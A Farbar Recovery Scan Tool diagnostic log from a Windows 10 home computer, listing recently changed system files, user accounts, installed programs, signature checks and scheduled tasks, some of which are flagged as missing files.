2016-12-13 22:58 - 2016-12-09 05:20 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-12-13 22:58 - 2016-12-09 05:20 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-12-13 22:58 - 2016-12-09 05:20 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-12-13 22:58 - 2016-12-09 05:18 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-12-13 22:58 - 2016-12-09 05:15 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-12-13 22:58 - 2016-12-09 04:47 - 22563328 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-12-13 22:58 - 2016-12-09 04:45 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll
2016-12-13 22:58 - 2016-12-09 04:42 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-12-13 22:58 - 2016-12-09 04:37 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-12-13 22:58 - 2016-12-09 04:33 - 03777536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-12-13 22:58 - 2016-12-09 04:30 - 23677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-12-13 22:58 - 2016-12-09 04:29 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-12-13 22:58 - 2016-12-09 04:27 - 13084160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-12-13 22:58 - 2016-12-09 04:27 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2016-12-13 22:58 - 2016-12-09 04:26 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-12-13 22:58 - 2016-12-09 04:22 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-12-13 22:58 - 2016-12-09 04:22 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-12-13 22:58 - 2016-12-09 04:21 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-12-13 22:58 - 2016-12-09 04:20 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditBufferTestHook.dll
2016-12-13 22:57 - 2016-12-09 05:42 - 01637728 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-12-13 22:57 - 2016-12-09 05:42 - 00137568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-12-13 22:57 - 2016-12-09 05:34 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-12-13 22:57 - 2016-12-09 05:34 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-12-13 22:57 - 2016-12-09 05:33 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-12-13 22:57 - 2016-12-09 05:33 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-12-13 22:57 - 2016-12-09 05:30 - 00377184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:28 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-12-13 22:57 - 2016-12-09 05:20 - 02677544 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2016-12-13 22:57 - 2016-12-09 05:19 - 00168424 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcrypt.dll
2016-12-13 22:57 - 2016-12-09 05:18 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-12-13 22:57 - 2016-12-09 05:18 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-12-13 22:57 - 2016-12-09 05:14 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-12-13 22:57 - 2016-12-09 05:14 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-12-13 22:57 - 2016-12-09 05:10 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-12-13 22:57 - 2016-12-09 05:09 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-12-13 22:57 - 2016-12-09 04:41 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-12-13 22:57 - 2016-12-09 04:38 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-12-13 22:57 - 2016-12-09 04:37 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-12-13 22:57 - 2016-12-09 04:36 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-12-13 22:57 - 2016-12-09 04:33 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-12-13 22:57 - 2016-12-09 04:28 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-12-13 22:57 - 2016-12-09 04:27 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-12-13 22:57 - 2016-12-09 04:26 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-12-13 22:57 - 2016-12-09 04:25 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-12-13 22:57 - 2016-12-09 04:24 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-12-13 22:57 - 2016-12-09 04:21 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-12-13 22:57 - 2016-12-09 04:20 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-12-13 22:57 - 2016-11-02 05:25 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-12-13 22:56 - 2016-12-09 05:18 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-12-13 22:56 - 2016-12-09 05:18 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-12-13 22:56 - 2016-12-09 05:18 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-12-13 22:56 - 2016-12-09 05:18 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-01-11 00:05 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine
2017-01-10 20:33 - 2016-09-26 19:47 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-01-10 07:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-01-10 07:42 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-01-09 21:26 - 2016-06-04 17:02 - 00000887 _____ C:\Users\Dorraine\Desktop\Networdz.lnk
2017-01-08 14:38 - 2015-10-17 21:34 - 00000000 ___RD C:\Users\Dorraine\Dropbox
2017-01-04 23:18 - 2016-10-08 16:10 - 00051354 _____ C:\Users\Dorraine\Documents\Community Chapel Baptist Church Bulletin, Page 1.odt
2017-01-03 12:33 - 2016-11-15 17:55 - 00000000 ____D C:\Users\Dorraine\AppData\LocalLow\Mozilla
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\ProgramData\TEMP
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster
2016-12-31 17:40 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Videos
2016-12-31 17:35 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming
2016-12-31 17:33 - 2016-07-16 01:04 - 00000000 ___RD C:\Program Files (x86)
2016-12-31 16:36 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2016-12-30 22:51 - 2016-09-26 19:51 - 00262144 ____H C:\Users\DefaultAppPool\NTUSER.DAT
2016-12-27 20:21 - 2016-09-26 19:48 - 00067584 ____S C:\WINDOWS\bootstat.dat
2016-12-27 20:19 - 2016-09-27 01:12 - 00007942 _____ C:\WINDOWS\PFRO.log
2016-12-27 20:19 - 2016-09-26 20:07 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-12-27 20:19 - 2016-09-26 19:57 - 3019087872 ___SH C:\hiberfil.sys
2016-12-27 20:19 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\drivers
2016-12-27 20:19 - 2016-06-24 10:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-27 20:19 - 2016-06-03 14:07 - 268435456 ___SH C:\swapfile.sys
2016-12-27 20:18 - 2016-09-26 19:51 - 104857600 ____H C:\Users\Dorraine\NTUSER.DAT
2016-12-27 20:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\catroot2
2016-12-27 20:18 - 2016-07-16 01:04 - 83886080 _____ C:\WINDOWS\system32\config\SOFTWARE
2016-12-27 20:18 - 2016-07-16 01:04 - 13369344 _____ C:\WINDOWS\system32\config\SYSTEM
2016-12-27 20:18 - 2016-07-16 01:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2016-12-27 20:18 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\DEFAULT
2016-12-27 20:18 - 2016-07-16 01:04 - 00028672 _____ C:\WINDOWS\system32\config\SECURITY
2016-12-27 20:17 - 2016-09-27 01:11 - 06291456 ____H C:\Users\Dorraine\AppData\Local\IconCache.db
2016-12-25 06:51 - 2015-09-28 21:08 - 00000000 __SHD C:\System Volume Information
2016-12-24 15:02 - 2016-11-15 14:32 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-22 23:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Drivers\UMDF
2016-12-22 23:43 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\System32
2016-12-21 23:57 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Pictures
2016-12-21 22:22 - 2016-07-16 06:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs
2016-12-21 22:22 - 2015-10-17 20:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-12-16 15:23 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2016-12-15 21:51 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\Microsoft.NET
2016-12-15 21:32 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\assembly
2016-12-15 20:08 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\config
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000002.regtrans-ms
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-15 11:43 - 2016-09-26 19:50 - 00065536 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-15 11:05 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\WinSxS
2016-12-14 19:19 - 2016-09-26 19:46 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00225032 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-14 19:19 - 2016-09-26 19:46 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-14 19:19 - 2015-09-29 08:09 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-12-14 19:18 - 2016-07-16 06:47 - 00000796 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Boot
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppPatch
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\SysWOW64
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-14 06:06 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2016-12-14 06:04 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-12-14 05:57 - 2015-09-28 15:17 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-12-14 05:55 - 2015-09-28 15:17 - 135632432 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-12-13 22:32 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-12-13 22:32 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-12-12 16:11 - 2016-09-26 19:51 - 00524288 ___SH C:\Users\Dorraine\NTUSER.DAT{289dfd7d-8454-11e6-ba0e-82e1840c0602}.TMContainer00000000000000000002.regtrans-ms
2016-12-12 16:11 - 2016-09-26 19:51 - 00065536 ___SH C:\Users\Dorraine\NTUSER.DAT{289dfd7d-8454-11e6-ba0e-82e1840c0602}.TM.blf
==================== Files in the root of some directories =======
2016-05-17 16:14 - 2016-05-26 23:14 - 0000145 _____ () C:\Users\Dorraine\AppData\Roaming\WB.CFG
2015-10-01 15:14 - 2016-10-13 15:10 - 0013271 _____ () C:\ProgramData\hpzinstall.log
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-12-11 20:57
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Dorraine (11-01-2017 01:59:30)
Running from C:\Users\Dorraine\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 01:10:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2694957348-435827945-4273115747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2694957348-435827945-4273115747-503 - Limited - Disabled)
Dorraine (S-1-5-21-2694957348-435827945-4273115747-1000 - Administrator - Enabled) => C:\Users\Dorraine
Guest (S-1-5-21-2694957348-435827945-4273115747-501 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20042 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Any Video Converter 6.0.7 (HKLM-x32\...\Any Video Converter) (Version: 6.0.7 - Anvsoft)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software_Min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
F2200 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Hearts Screen Saver (HKLM-x32\...\Hearts) (Version: - )
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet F2200 All-In-One Driver Software 14.0 Rel. 6 (HKLM\...\{60D6AAC5-FDC1-49BA-867B-3135F4726156}) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NewFreeScreensaver nfsSnowGlobe2 (HKLM-x32\...\Snow Globe 2 New Free Screensaver_is1) (Version: - NewFreeScreensavers.com)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Spotify) (Version: 1.0.28.87.g8f9312a4 - Spotify AB)
SpywareBlaster 5.5 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.5.0 - BrightFort LLC)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1206 - SUPERAntiSpyware.com)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.59518 - TeamViewer)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
Windows Driver Package - Broadcom (k57nd) Net (05/10/2011 14.8.0.5) (HKLM\...\6629B48C523118E251A0FF9A803F20EC1B1A9344) (Version: 05/10/2011 14.8.0.5 - Broadcom)
Windows Driver Package - Broadcom (k57nd60a) Net (08/25/2012 15.4.0.9) (HKLM\...\E6C66B158167F5F97E7C3CC032E8B9CF807548D1) (Version: 08/25/2012 15.4.0.9 - Broadcom)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{087B3AE3-E237-4467-B8DB-5A38AB959AC9}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{3B092F0C-7696-40E3-A80F-68D74DA84210}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{63542C48-9552-494A-84F7-73AA6A7C99C1}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{7BC0E710-5703-45BE-A29D-5D46D8B39262}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\ooofilt_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{AE424E85-F6DF-4910-A6A9-438797986431}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\propertyhdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{C52AF81D-F7A0-4AAB-8E87-F80A60CCD396}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {09186449-4F69-4D44-AE36-EA2DBCFCF7D4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {14EF3ED1-3A48-4E29-8661-AD0039797D76} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {21F8144E-8385-4FB5-8A93-41ECC6D63326} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2FDD2155-71BB-429A-9A8F-78F4A259FDBD} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {308E7E8B-2216-4C27-BF3C-045EAA465BB3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-10-21] (Adobe Systems Incorporated)
Task: {313857CE-F959-4F91-BC7B-8277A3515412} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3FD521FC-5F16-49A4-8F32-2343C0DCB866} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {46C40E51-DCC9-49CE-898E-170CA5373F61} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4BBB7A2E-49CB-4BF4-87CA-DEDAF4EC978E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6855ACB5-22ED-49E6-A845-551DD10C9A9E} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {81E5946D-A837-4EA1-B26C-3B4F71FD0B3D} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {8CA4CABA-7807-41BC-AAB6-00049AC72548} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
